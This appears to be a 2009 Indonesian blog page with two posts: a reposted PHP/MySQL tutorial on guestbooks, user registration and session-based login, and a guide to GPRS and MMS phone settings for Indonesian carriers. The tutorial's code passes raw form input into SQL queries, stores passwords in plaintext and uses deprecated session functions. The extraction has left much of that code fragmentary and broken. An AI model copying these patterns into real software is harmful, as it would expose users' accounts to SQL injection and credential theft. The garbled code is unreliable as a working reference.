OCU ONLINE: Mei 2009

trik php

Tips Tips dan Trik Membuat WebsiteDengan PHPWelly Tunggalawelly@seven-warrior.com - welly_tunggala@yahoo.com http://www.seven-warrior.com

Tulisan berikut ini, kita akan mempelajari PHP Script. PHP Script digunakan untuk membuatwebsite yang mempunyai koneksi ke program database populer seperti SQL sehingga padaakhirnya digunakan untuk membuat fasilitas , seperti login, guestbook dan sebagainya. Sayamengucapkan terima kasih kepada Anda yang telah bersedia membaca dan mempraktekan artikel inidan tidak lupa juga saya memohon bimbingan teman – teman lain untuk menambah pengetahuansaya, karna saya masih dalam tahap belajar.Tulisan ini akan membahas :- Guestbook- Registrasi & Login Authentication- IP Address Log- Shopping OnlineSeperti yang Anda lihat diatas cukup sedikit bukan? Tapi jangan khawatir, karena ini cukup untukmodal Anda dalam mengembangkan website Anda sendiri.Untuk membuat website dengan script PHP menggunakan Frontpage, pastikan Frontpage Andamenjadi editor default untuk Script PHP Anda, caranya lakukan seperti demikian, masuklah kemenuTools dan Pilih Option, setelah Anda menclick Option maka akan tampil jendela Option sepertigambar dibawah ini, kemudian pilih lagi Tab Configure Editors, carilah dalam Listbox Colom Typedengan jenis PHP & PHP3, kemudian click dan click tombol Modify setelah itu ketikkan fileexecutable dari Frontpage Anda, dan ganti Editor Namenya menjadi Frontpage, default daridirectory Frontpage AdalahC:/Program Files/Microsoft Office/Office10/frontpg.exe1Lisensi Dokumen:Copyright © 2003 IlmuKomputer.ComSeluruh dokumen di IlmuKomputer.Com dapat digunakan, dimodifikasi dan disebarkansecara bebas untuk tujuan bukan komersial (nonprofit), dengan syarat tidak menghapus ataumerubah atribut penulis dan pernyataan copyright yang disertakan dalam setiap dokumen.Tidak diperbolehkan melakukan penulisan ulang, kecuali mendapatkan ijin terlebih dahuludari IlmuKomputer.Com.Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.ComPerhatikan gambar dibawah ini apabila Anda mengclick Modify :Mengapa PHP?

1. Mudah dipelajari

2. Dapat dikoneksikan dengan semua database populer

3. Paling populer saat ini.Membuat Connection Database FileBerikut ini kita akan membuat koneksi antara PHP dengan program database (dalamhal ini MySql).Bagi Anda programmer database yang bukan programmer Website akan sangat mudah untukmengerti hal ini. Pertama , kita buat suatu file yang nantinya akan digunakan untuk koneksi keMySql. Kita namakan file ini adalah database.php .

Perintahnya adalah :2Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.ComUntuk lebih jelasnya mari perhatikan contoh perintah dibawah ini,Pada umumnya hostnamenya adalah LOCALHOST baik itu di server hostingnya atau server Andasendiri.. Untuk username database Anda beserta password database Anda apabila Anda hosting pastiakan diberikan oleh server hosting Anda. Function Connect_db() dapat Anda rubah sesuai keinginanAnda, dengan catatan yang Anda rubah adalah Connect_db() bukan functionnya. Demikian juga$db_hostname sampai $db_name, sedangkan dalam Function terdapat Global $db_hostname,$db_username, $db_password, $db_name nantinya akan dipanggil dengan Include atauRequire_once. $db_name adalah nantinya nama Table dalam Database Anda.Baiklah, sekarang kita telah membuat suatu file untuk koneksi ke database Anda yang berada diserver Anda. Jangan lupa untuk simpan ke nama database.php untuk dipergunakan nanti. Anda dapatmembuat file ini menggunakan teks editor seperti notepad, wordpad dan sebagainya.GUESTBOOKSekarang kita akan membuat simple guestbook untuk website Anda. Biasanya guestbook simple ituhanya terdiri dari Entry New Guestbook dan Browse Guestbook, nah sekarang ini kita akanmembahas yang simple saja dahulu untuk perkembangan lebih lanjut Anda bisa mengkombinasikansendiri modelnya termaksud menambahkan berbagai fasilitas lainnya seperti Admin Guestbook.Baiklah, perhatikan dibawah ini untuk source codenya agar Anda bisa langsung mengetahuibagaimana gaya source code PHP untuk guestbook.3;$db_username=;$db_password=;$db_name=;function connect_db() {global $db_hostname, $db_username, $db_password, $db_name;mysql_connect($db_hostname, $db_username, $db_password) or die ('Sorry cannot connect tothe database because: ' . mysql_error());;mysql_select_db($db_name);}?>

Seperti Anda lihat diatas, ini adalah source code PHP, tapi apakah hanya sedikit ini? Sabar, masihada yang dibuat dalam bentuk textbox isian yang dibuat dari frontpage atau notepad juga bisa, asalAnda bisa mengatur tata letaknya agar kelihatan indah ?. Mari kita lanjutkan untuk textbox isiannyadengan Frontpage, perhatikan dibawah ini4

";print "Pengisian Gagal!!!";print "
";print "";print "Pesan Anda Gagal Dimasukkan";}else{print "";print "Pengisian Berhasil!!!";print "
";print "";print "Pengisian Berhasil dilakukan";}}?>Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.Com5Chat Comunitie - Guestbook Entry

View Messege |Home

Saya jelaskan sedikit Source Code diatas. Include "database.php"; adalah untuk memanggil filedatabase.php yang telah kita buat tadi untuk membuat koneksi ke database Anda, apabila ini tidakada dalam source code tadi, maka pasti akan terjadi error saat Anda meload web Anda, perhatikansetiap line baris dalam php harus diakhiri dengan tanda titik koma (;).

Kecuali kondisi If dimanaharus diawali dengan tanda kurung kurawal buka dan diakhiri dengan tanda kurung kurawal tutup{ (buka) dan } (tutup).if($action=="save"){}else {}Kondisi ini apa hanya sampai disini? Belum tentu, ini tergantung sesuai dengan kebutuhan Anda,apabila Anda ingin kondisi if lebih panjang dengan berbagai kondisi dalam }else { dan bisamenjadikan }elseif { untuk menyatakan kondisi lain lagi dalam 1(satu) kondisi pertama.Kenapa dalam if tersebut ada $action==”save”) ? “save” tersebut adalah suatu pernyataan dalamform yang dibuat dalam Frontpage tadi dimana file guestbook tersebut dipanggil ulang dan membacakondisi IF tersebut dan apabila dalam form Frontpage Anda menyatakan panggilan SAVE makadalam kondisi yang terdapat “save” akan dijalankan, contoh :6

Guestbook Entry
Nama
Alamat Email
Alamat URL
Subject
Pesan

[BackTo Home]

Pada dasarnya ?action=save ini tidak seharusnya menyatakan ?action, Anda dapat membuat dengan seperti ?panggilatau lainnya. Sudah jelas bukan? Sekarang pasti Anda menanyakan apa sih fungsi session_register?Pada pembahasan berikut akan dibahas. Lihat contoh hasilnya apabila telah selesai :Tombol submit adalah tombol yang akan memproses data kita untuk di simpan di database kita danformnya akan memberikan action “save” tadi. Nah untuk View Messegenya, source codenya Andadownload saja, biar Anda tidak mumet membacanya ?. Perhatikan !!! Sebelum Anda mencobasource code ini, pastikan Anda membuat dulu table yang bersangkutan dalam database Anda,Contohnya Guestbook ini membutuhkan Tabel Guestbook, maka buatlah table guestbook dalamdatabase Sql Anda dan fieldnya sesuai dengan apa yang dibutuhkan atau apa yang ada didalamsource code ini. Apabila Anda belum membuatnya dan langsung mencoba source code ini, makaakan terjadi error open table.Registrasi dan Login AuthenticationRegistrasi dalam website PHP sangatlah diperlukan, apalagi jika Anda mau memprotek beberapasite dalam domain Anda. Dalam hal ini kita akan menggunakan session_register untuk Register danLogin page ini, mengapa demikian? Anda akan tahu nanti apabila Anda akan mengetik danmembaca lebih lanjut pada subbab ini .Session_register adalah suatu penyimpan variable local yang telah diisi dengan suatu kalimat ataukata – kata bahkan suatu isi field dari database Anda sendiri. Suatu contoh seperti demikian :$cNama adalah suatu variable local dimana hanya dapat dipakai dalam file tersebut, apabila Andamemanggil file lain untuk menampilkan variable Anda, maka ini akan gagal apabila Anda tidakmenyatakan bahwa ini adalah variable public.

Contoh 1 :Session_start();Session_register(“cNama_public”);$cNama = “Welly Tunggala”;$cNama_public = $cNama;Dengan demikian maka $cNama_public yang kita gunakan untuk menampilkan isi dari variable$cNama dengan menggunakan $cNama_public = $cNama, atau dengan perintah singkat :7Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.ComContoh 2 :Session_start();Session_register(“cNama_public”);$cNama_public = “Welly Tunggala”;Pada contoh 2 jarang bahkan mungkin tidak digunakan dalam pembuatan website dari setiapkalangan programmer website, karena ini langsung dengan menyatakan isinya tanpa melakukanperubahan oleh pengunjung. Akan tetapi sebaliknya Contoh 1 lebih sering digunakan padapembuatan website, mengapa demikian? Seperti ini, apabila Anda membuat suatu login pagetentunya bukan hanya user itu saja yang mengunjungikan? Tentu dengan berbagai user yangmemasukkan username dan passwordnya, begitu bukan? Perhatikan contoh dibawah ini :Session_start();Session_register(“cNama_public”);$cNama_public = $cUsername;$cUsername adalah field textbox isian untuk user memasukkan password mereka, kita masukkankedalam session agar nantinya dapat dipakai untuk memproteksi halaman lainnya yang dimana userharus melakukan login terlebih dahulu sebelum melihat ataupun menampilkan nama lengkappengunjung web kita nantinya.Session_start();Session_register(“cNama_public”);$cNama_public = $cUsername;Session_register($cNama_public);Tulisan yang miring diatas menyatakan bahwa session itu akan dipakai nantinya sehingga harusdiregister kedalam session dengan isi variable $cUsername (Textbox). cUsername adalah sebuahkotak isian yang telah kita buat dengan nama field textbox tersebut adalah cUsername, untuk lebihjelasnya mari perhatikan source code untuk register.php dibawah ini :Pertama – tama buatlah table dengan command seperti dibawah ini :Source code untuk table ini dapat Anda simpan kedalam bentuk file *.txt atau langsung Andamengetikkan pada database Anda nantinya dengan mengklick Sql Menu pada PhpMyAdmin.Phpnantinya, tapi saya sarankan lebih baik Anda simpan seluruh table yang Anda butuhkan kedalam 1file *.txt dan kemudian tinggal memasukkan file ini ke Database Anda dan secara otomatis akantercreate sendiri kedalam database Anda tanpa harus membuat satu persatu, terutama apabila Andahosting, akan memakan waktu cukup lama.Apabila Anda telah membuat table diatas, maka buatlah source code website Anda

sepertidibawah ini :8CREATE TABLE `userreg` (`id` INT AUTO_INCREMENT PRIMARY KEY ,`username` VARCHAR( 50 ) NOT NULL ,`password` VARCHAR( 30 ) NOT NULL ,`nama` VARCHAR( 50 ) NOT NULL ,`alamat` VARCHAR( 50 ) NOT NULL);

";print "Regitrasi Gagal!!!";print "
";print "";print "Username Tidak Boleh Kosong";}elseif(empty($cPassword)){print "";print "Regitrasi Gagal!!!";print "
";print "";print "Password Anda Tidak Boleh Kosong";}elseif(empty($cNama)){print "";print "Regitrasi Gagal!!!";print "
";print "";print "Nama Lengkap Anda Tidak Boleh Kosong";}elseif(empty($cAlamat)){print "";print "Regitrasi Gagal!!!";print "
";print "";print "Alamat Anda Tidak Boleh Kosong";}else {connect_db();$qUserExists = "SELECT * FROM userreg WHERE username='$cUsername'";$user_exists = mysql_query($qUserExists);if (mysql_num_rows($user_exists) > 0){print "";print "Regitrasi Gagal!!!";print "
";print "";print "Maaf Username Telah Terpakai, Silahkan Pilih Yang Lain";}else {$result=mysql_db_query($db_name, "INSERT INTO userreg(username, password, nama, alamat )VALUES ('$cUsername', '$cPassword', '$cNama', '$cAlamat')");if($result){print "";print "Data Berhasil Tersimpan!!!";}else {print "";print "Maaf Upload Foto Anda Gagal!!!";}

Bagian source code yang bertulisan tebal adalah bagian pengecekan entry fieldnya, apabila tidaksesuai dengan apa yang kita tetapkan maka registrasi akan gagal, source code yang Anda lihat agaksemberawut dikarenakan bentuk tulisannya yang tidak mendukung, maka disarankan Andamendownload source code yang dalam bentuk file *.PHP, perhatikan hasilnya seperti dibawah ini :Apabila user tidak atau lupa mengisi usernamenya, maka pesan error akan muncul sesuai dengan apayang Anda lihat diatas. Sedangkan untuk tulisan miring adalah mengecek apakah username yangdimasukkan telah terdaftar didalam table database Anda, apabila telah terdaftar maka pesan errorakan muncul sesuai dengan apa yang Anda masukkan pesannya . Selebihnya adalah memasukkandata user kedalam database Anda, dan tersimpan. Mudah bukan? Untuk membuat bentuk sepertidiatas, penulis hanya menggunakan Frontpage, karena lebih mudah dalam pengaturan tata letak danlebih mudah dalam membuat website menjadi indah. Perhatikan source code selengkapnya dibawahini :10}}}?>

{Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.ComSource selengkapnya, silahkan dilihat pada lampiran tulisan ini. Perhatikan dari dalam source code !12$result=mysql_db_query($db_name, "INSERT INTO userreg(username, password, nama, alamat )VALUES ('$cUsername', '$cPassword', '$cNama', '$cAlamat')");if($result){print "";print "Data Berhasil Tersimpan !!!";}else {print "";print "Maaf Data Anda Gagal Disimpan !!!";}}}}?>Register

User Registration

Comada tulisan tebal? Inilah yang nantinya akan menjadi variable dalam penampungan isian userkemudian akan dimasukkan kedalam session. Bagaimana jika menggunakan session untuk registrasipage? Gampang, perhatikan dibawah ini :Session_start(); , menandakan bahwa mulai dari sini session di jalankanSession_registe(“cReg_Username”); , adalah menyatakan bahwa nantinya session akanmenggunakan ini Untuk mengenalkan variable ini ke halaman lainSession_register(“cReg_nama”); , sama halnya dengan cReg_usernameUntuk lebih jelasnya mari kita lihat source code dibawah ini dengan session :13

Anda lihat diatas? Ada tulisan yang tebal, tebal garis bawah dan tebal miring? Baik akan sayajelaskan dari yang ditandai diatas. Tulisan tebal adalah menyatakan session yang akan dipakai dalamhalaman berikutnya dimana $cReg_username diisi dengan variable $cUsername dan juga dimana$cUsername telah diisi dengan hasil isian user pengunjung tadi. Perhatikan ! setiap variable harusdiawali dengan tanda $ (dolar), begitu seterusnya. Dan juga mengenai tulisan tebal garis bawahadalah menandakan bahwa nantinya session dengan variable $cReg_username akan dipakai padahalaman berikutnya sebagai tanda bahwa session tersebut sama atau tidak, dan juga dapat digunakanuntuk mencari didalam database Anda berdasarkan $cReg_username, juga dapat dipakai untukmembatasi user untuk masuk kehalaman yang tidak seharusnya dia masuk. Setelah semua diisidengan benar, tentunya harus pindah kehalaman yang dimaksud bukan? Dari tulisan tebal miringmenyatakan kita akan berpindah ke halaman result.php dengan menggunakan perintah header.Tentunya dalam file result.php bukannya hanya blank begitu saja melainkan harus diberikan codejuga dari PHP untuk memanggil session – session yang telah kita register tadi. Perhatikan sourcecodenya dibawah ini untuk memanggil session tadi :Karena tadi telah kita register ke dalam session, maka untuk menampilkan variable yang telahdiregister, kita cukup memanggil session_start() untuk membukanya. Sekarang kita hanya tinggalmemanggil variable – variable tadi sehingga dapat menampilkan hasil isi dari variable tadi,perhatikan source code lengkapnya

dibawah ini :14

$result=mysql_db_query($db_name, "INSERT INTO userreg(username, password, nama, alamat )VALUES ('$cUsername', '$cPassword', '$cNama', '$cAlamat')");if($result){$cReg_username=$cUsername;$cReg_password=$cPassword;$cReg_nama=$cNama;$cReg_alamat=$cAlamat;session_register($cReg_username);header("location: result.php")print "";print "Data Berhasil Tersimpan !!!";}else {print "";print "Maaf Data Anda Gagal Disimpan !!!";}}}}?>Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.Com15Result

Username

Data Anda TelahTersimpan, Terima Kasih Anda Telah Bergabung Bersama kami...!!!
UserEntry Result
Username Anda
Password Anda
Nama Lengkap Anda
Alamat Anda

Click disini Untuk Login

Perhatikan tulisan tebal dari source code diatas, itu adalah source code dalam bentuk PHP yangmemanggil variable yang telah kita register atau simpan dalam session tadi. Mudah bukan?Perhatikan hasilnya seperti gambar dibawah ini.Untuk melakukan proteksi terhadap halaman yang Anda inginkan, Anda tinggal tambahkan perintahseperti

dibawah ini :";print "Illegal Access!!!";print "
";print "";print "Please Login First Then You Can Access ThisPage!!!";exit;}?>

Halaman yang ditaruh adalah halaman yang Anda inginkan user tidak berhak akses tanpa login, dandiletakkan diatas tag , atau Anda ingin menghancurkan session yang telah teregister tadi,lakukan dengan perintah :Kita menggunakan if($action==”logout”){ dikarenakan apabila user kembali ke halaman pertama,dan tanpa menyatakan if tadi tersebut, maka akan terjadi destroy session tanpa kita ketahui dankemudian kembali ke 2 kalinya ke area home maka akan terjadi error, maka lebih baik kita16Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.Commemasukkan if action tadi agar apabila user mengclick logout baru terjadi session destroy. Caranyaapabila Anda mau membuat tulisan Link untuk LOGOUT Anda tinggal menuliskan hyperlinknyaseperti demikian :Index.php?action=logout (untuk memanggil kembali file index.php dan menjalankan $action)Bagaimana? Mudah bukan? Baiklah sekarang mari kita membuat suatu form login untuk user loginterlebih dahulu sebelum ia dapat mengakses halaman lain yang telah kita proteksi. Pada umumnyaweb seseorang langsung menempatkan login didalam halaman utama websitenya, agar user dapatmelihat terlebih dahulu barang atau gambar bahkan berita – berita kecil sebelum user masuk lebihjauh. Akan tetapi pada dasarnya juga ada yang langsung meminta login sebelum masuk ke halamanutama website tersebut, tapi jarang.Dari penjelasan diatas, teknik pembuatannya hampir sama hanya beda beberapa command yangapabila meminta login dahulu baru masuk ke halaman utama, kita menggunakan Javascript untukmenampilkan kotak login. Kotak login dan login dahulu sebelum masuk ke halaman utama sangatlahrawan, maka dari pada itu banyak yang tidak menggunakannya lagi dibanding halaman utama yanglangsung ada loginnya didalam. Baiklah sekarang kita akan membahas halaman utama beserta logindidalamnya. Perhatikan gambar dibawah ini :Untuk form login diatas, Anda bisa mententukan POSTnya untuk memanggil action=login. Untukmembuatnya buatlah dulu tampilan dan form seperti diatas (optional) setelah itu pada form loginclick kanan, apabila benar Anda membuatnya pada menu click kanan akan muncul menu FormProperties, lihat gambar dibawah ini :17Artikel Populer

IlmuKomputer.ComCopyright © 2003 IlmuKomputer.ComSetelah Anda masuk ke dalam menu Form Properties, akan muncul jendela Form Properties juga.Didalam jendela tersebut defaultnya adalah Option Send To dimana send to tersebut adalah tempatuntuk mengisi hasil isian form tersebut kedalam tempat Anda buat, apabila pilihan Anda File Namemaka hasil isian tersebut dimana user nantinya mengclick Login maka akan tersimpan pada file yangtelah kita spesifikasikan. Apabila Anda memilih E-mail Address maka nanti akan di kirimkan kealamat email yang telah kita spesifikasikan.Disini kita memilih Send To Other yang akan kita kaitkan dengan PHP script nanti, click optiontersebut dan Anda click Tombol Option dibawah kiri dijendela Form Properties tersebut, perhatikangambar dibawah ini :18Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.ComSetelah Anda klik Tombol Option maka akan tampil jendela Options for Custom From Handler,seperti pada gambar diatas. Defaultnya pada Textbox isian Action adalah WebSleftBot, gantilahdengan perintah seperti dibawah ini ;?action=loginContoh :Index.php?action=loginIndex.php adalah optional dimana index.php adalah nama tempat kita menaruh form login yang telahkita letakkan pada file index awal dari website kita, action juga optional dapat diganti dengan“jalankan” atau sejenisnya & login juga demikian. Semua ini akan dipanggil nantinya pada scriptPHP yang seperti demikianPerhatikan !!!, tulisan tebal tersebut adalah berpasangan pada form diatas, demikian juga tulisanmiring. Setelah itu maka selesai dan simpanlah dengan nama index.php, jangan simpan dengan namaindex.html karena PHP Anda tidak akan terbaca, tapi lebih baik Anda mencobanya ?.Ada nggak cara buat tombol tipis gak nimbul kayak bisulan? Oh..ada donk, seperti kayak gambardibawah ini yah?Begini, untuk tombol seperti diatas tersebut dibuat dari Frontpage lebih mudah, Anda bisa sajamembuatnya dengan Javascript, tapi lebih repot. Buat apa susah – susah, sudah ada kok fasilitasnya,baik untuk caranya adalah lakukan double click pada tombol yang ingin di buat seperti diataskemudian Anda akan dapatkan jendela Push Button Properties seperti gambar dibawah ini :Setelah Anda melihat jendela seperti diatas? Lakukan click pada tombol Style untuk lebih lanjut,jangan hiraukan yang lain dulu.Setelah Anda melakukan seperti apa yang ditulis dalam artikel ini, akan muncul jendela sepertigambar dibawah ini :19Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.ComAnda akan mendapat jendela Modify Style, selanjutnya lakukan click Tombol Format untukmelakukan Edit lanjutan, perhatikan gambar dibawah ini :Setelah Anda click Tombol Format, maka akan tampil menu yang dimana Anda pilih Border untukmembuat tombol tipis seperti diatas tadi, click Border dan perhatikan gambar dibawah ini :20Artikel Populer IlmuKomputer.ComCopyright © 2003 IlmuKomputer.ComNah..Anda dapatkan jendela seperti diatas, defaultnya pada Style adalah NONE, scroll keatas dancari SOLID kemudian clicklah SOLID dan kemudian OK sampai selesai, maka Anda akanmendapatkan tombol seperti yang Anda pertanyakan tadi, mudah bukan? Mau kelanjutannya? utakatik sajalah, nanti pasti bakal tahu kok ?.Banyak dari contoh source dalam artikel ini tidak jelas, dikarenakan source ini hanyalah sebagaicontoh untuk penjelasan, sekali lagi disarankan untuk medownload sourcenya dan ikuti materinya,agar penjelasan yang Anda dapatkan lebih sempurna.21

Pengaturan /setting GPRS, MMS, EmailHP Sonyericsson

17.28

Penggunaan HP sekarang mulai beralih fungsi sebagai media transfer data. Di salah satu sisi
matinya teknologi 3G dikarenakan minimnya pemakaian, dan kebanyakan orang sudah cukup
dengan teknologi GPRS. Berikut ini akan dijelaskan cara cepat mengatur/setting GPRS, MMS,
Email di HP SonyEricsson anda lewat internet. Cara ini sangat mudah sehingga bisa cepat
dilakukan.
1. Masuk ke situs sony ericsson Indonesia bagian dukungan produk, klik ini:
http://www.sonyericsson.com/cws/support/products?cc=id&lc=id

2. Pilih jenis telepon
3. Pilih pengaturan: WAP(GPRS), Email, MMS (satu-satu)
4. Isi informasi negara, operator, dan jenis HP
5. Klik berikutnya
6. Masukan nomor teleponnya
7. Klik berikutnya
8. Isikan kolom sandi sesuai pada layar
9. Anda akan mendapatkan kode pin yang akan digunakan untuk mengaktifkan settingan
tersebut.
Sony-Ericsson: D750, D750i, F500i, J200i, J210i, J220i, J230i, J300a, J300i, K200i, K300,
K300a, K300i, K310, K310a, K310i, K320i, K500i, K508, K508c, K508i, K510a, K510i, K530i,
K550i, K600, K600i, K608i, K610, K610i, K618i, K700, K700c, K700i, K750, K750i, K790a,
K790i, K800i, K800iv, K810i, K850i, M600i, P1i, P800, P900, P910, P910a, P910i, P990i,
S500i, S700, S700i, S710a, T226, T230, T250i, T290a, T290i, T610, T616, T630, T637, T650i,
T68, V600, V600i, V630i, W200a, W200i, W300, W300i, W550c, W550i, W580i, W600c,
W600i, W610i, W660i, W700i, W710i, W800c, W800i, W810i, W810iv, W830i, W850i,
W850iv, W880i, W900i, W910i, W950i, Z1010, Z200, Z300i, Z310i, Z310iv, Z500, Z500a,
Z520a, Z520i, Z530i, Z550a, Z550i, Z558i, Z600, Z610i, Z710i, Z800
Kalo yg kesusahan (server SE lagi down) bisa setting lewat SMS
SETTING GPRS OTA (OVER THE AIR)
Mentari :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3000
Contoh: GPRS NOKIA 7650
Matrix :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3939
Contoh: GPRS NOKIA 7650
IM3 :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3939
Contoh: GPRS NOKIA 7650
XL :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 9667
Contoh: GPRS NOKIA 7650
Telkomsel :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 5432
Contoh: S NOKIA 7650
Halo
Daftar di GRAPARI atau Ketik SMS: “GPRS” kirim ke 6616 untuk aktifkan MMS : ketik SMS :
“MMS” kirim ke 6616
Setelah anda kirim smsnya, anda akan menerima sms settingan secara otomatis dari operator
celluler anda, silahkan langsung di simpan, maka secra otomatis celluler anda akan tersetting,
sesuai kebiasanya, and akan disuruh memasukkan password/pin yg dikirim lwt sms
Adapun utk pengaturan email karena banyak metoda yg tiap handphone berlainan dan akan
membuat anda bingung (kecuali yg sdh terbiasa), lebih baik anda memakai cara ini;

Gmail: ketik di halaman browser anda (GPRS sdh aktif) http://m.gmail.com/

Yahoo: ketik di halaman browser anda (GPRS sdh aktif) http://id.m.yahoo.com/p/mail

atau http://m.yahoo.com
nanti akan keluar pilihan utk mail, yahoo messenger, dll
Setting Manual
TELKOMSEL
I. GPRS
A. Data Communication
Go to menu Setting, and press Select
Choose Connectivity., and press Select
Choose Data communication., and press Select
Choose Data account, and press Select
Choose New account, and press Select
Choose GPRS data, and press Select
New account, enter data :
Name : TEL-GPRS
APN : telkomsel
User Name : wap
Password : wap123
Choose Save and then choose TEL-GPRS select Edit
Allow calls : Automatic
IP Address :
DNS Address :
Authentication : None, PAP, CHAP ( Check List )
Data Comp. : Off
Header Comp. : Off
B. Internet Settings
Go to menu Internet settings, and press Select
Choose Internet profile, and press Select
Choose New profile, and press Select
Name : TEL-GPRS
Connect using : TEL GPRS, and press save
Choose TEL GPRS, and press More
Choose Settings, and press Select
Connect using : TEL-GPRS
Use proxy : Yes
Proxy Address : 010.001.089.130
Port number : 8000
User name : wap
Password : wap123
Press Save
Then Back to Internet Setting > Internet profiles
Choose TEL GPRS, and press More
Choose Advanced, and press Select
Choose Change homepage, and press Select
Name : Sony Ericsson
Address : http://wap.sonyericsson.com
Press Save
II. MMS
A. Data Communication
Go to menu Setting, and press Select
Choose Connectivity, and press Select
Choose Data communication., and press Select
Choose Data account, and press Select
Choose New account, and press Select
Choose GPRS data, and press Select
New account, enter data :
Name : TEL MMS
APN : mms
User Name :
Password :
Choose Save and then press TEL MMS, press edit
Allow calls : Automatic
IP Address :
DNS Address :
Authentication : None, PAP, CHAP ( check list )
Data Comp. : Off
Header Comp. : Off
B. Internet Settings
Go to menu Internet settings, and press Select
Choose Internet profile, and press Select
Choose New profile, and press Select
Name : TEL MMS
Connect using : TEL MMS, and press save
ChooseTEL MMS, and press More
Choose Settings, and press Select
Connect using : TEL MMS
User Proxy : Yes
Security : Off
IP Address : 010.001.089.150
Port Number : 8080
User name : wap
Password : wap123
Press Save
Then Back to Internet Setting > Internet profiles
Choose TEL MMS, and press More
Choose Advanced, and press Select
Choose Change homepage, and press Select
Name : Sony Ericsson
Address : http://wap.sonyericsson.com

Press Save
C. Message Server
Go to menu Messaging
Select Settings
Select Picture Message
Validity Period : Network maximum
Read Report : Off
Delivery Report : ON
Signature : No Signature
Creation Mode : Alert
Picture Scaling : Off
Auto Download : Always
Accept Messages : Advertisements [check list]
Anonymous [check list]
MMS Profile : TEL MMS
Then Back to Picture Message > MMS profile
Choose TEL MMS, and press Edit
Press More TEL MMS, and Select Edit
MMS Profile Name : TEL MMS
Message Server : http://mms.telkomsel.com
Internet Profile : TEL MMS
Select OK
Press Save
Download setting manual (*.doc)
Cara aktivasi GPRS :
Langkah 1 mengaktifkan layanan GPRS di kartu :
Ketik SMS : GPRSonno_chip_kartu
Contoh : GPRS on 62218686690
Kirim ke : 6616
langkah 2 mengaktifkan GPRS ponsel anda :
Setting GPRS Automatis :
Ketik SMS : S‹spasi›MerkHP‹spasi›TypeHP
Contoh : S NOKIA 7650
Kirim Ke : 5432
Atau :
Setting GPRS Manual :
Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com

Data Bearer : GPRS
Proxy port number : 9201 atau 8000
INDOSAT MATRIX & MENTARI
Contoh Setting GPRS di Sony Ericsson T610
Setting Data Account GPRS
1. Tekan tombol navigasi untuk masuk ke menu utama
2. Pilih icon “Connectivity”
3. Pilih menu “Data comm.”
4. Pilih menu “Data accounts”
5. Pilih menu “New account”
6. Pada menu Account type pilih menu “GPRS data”
7. Pada Name: isi “Satgprs”
8. Pada menu New GPRS data isi parameter berikut :
• APN : satelindogprs.com
• User id : (kosongkan)
• Password : (kosongkan)
9. Tekan tombol save
Setting WAP
1. Tekan tombol navigasi untuk masuk ke menu utama
2. Pilih icon “Connectivity”
3. Pilih menu “WAP options”
4. Pilih menu “WAP profiles”
5. Pilih menu “New profile”
6. Pada menu New profile isi parameter berikut :
• Name : Satgprs
• Connect using : pilih Satgprs
• IP address : 202.152.162.250
7. Tekan tombol save
8. Masih dimenu “WAP Profiles”
9. Pilih “Satgprs”, tekan “Select”, lalu tekan “Edit” v 10. Pilih menu “Advanced”
11. Pilih menu “Change homepage”
12. Pada menu Change homepage isi parameter berikut :
• Name : Satgprs
• WWW Address : hapus [Internal address] ganti dengan “http://satwap

13. Tekan tombol panah sampai kembali ke standby.
14. Tekan tombol navigasi untuk masuk ke menu utama
15. Pilih icon “Internet services”
16. Pilih tombol “More”
17. Pilih “Satgprs” untuk mulai WAP browsing.
Cara penggunaan GPRS
1. Internet option
2. More
3. Pilih Menu Bookmarks
4. Pilih menu Add Bookmarks
• Title: Yahoo atau MIS
• Address: http://www.gsi-biz.com/mobile_gsi.jar

Setting GPRS Mentari, Matrix, IM3, XL, Telkomsel
MENTARI :
Setting GPRS OTA :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3000
Contoh: GPRS NOKIA 7650
Setting GPRS Manual :
Profile Name INDOSATGPRS
User name : indosat
APN : www.satelindogprs.com
Password : indosat
Gateway IP : 10.19.19.19
Homepage : http://wap.klub-mentari.com

Data Bearer : GPRS
Proxy port number :
MATRIX :
Setting GPRS OTA :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3939
Contoh: GPRS NOKIA 7650
Setting GPRS Manual :
Profile Name satelindo Homepage
User name :
APN : www.satelindogprs.com
Password :
Gateway IP : 202.152.162.250
Homepage : http://wap.matrix-centro.com

Data Bearer : GPRS
Proxy port number : 9201
IM3 :
Setting GPRS OTA :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 3939
Contoh: GPRS NOKIA 7650
Setting GPRS Manual :
Profile Name
User name : gprs
APN : www.indosat-m3.net
Password : im3
Gateway IP : 010.019.019.019
Homepage : http://wap.m3-access.com

Data Bearer : GPRS
Proxy port number : 9201 atau 8080
XL :
Setting GPRS OTA :
Ketik SMS: GPRS‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 9667
Contoh: GPRS NOKIA 7650
Setting GPRS Manual :
Profile Name : XL GPRS
User name : xlgprs
APN : www.xlgprs.net
Password : proxl
IP Address : 202.152.240.50
Homepage : http://wap.lifeinhand.com

Data Bearer : GPRS
Proxy port number : 8080
TELKOMSEL :
Setting GPRS OTA :
Ketik SMS: S‹spasi›MerkHP‹spasi›TypeHP
Kirim Ke: 5432
Contoh: S NOKIA 7650
Setting GPRS Manual :
Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
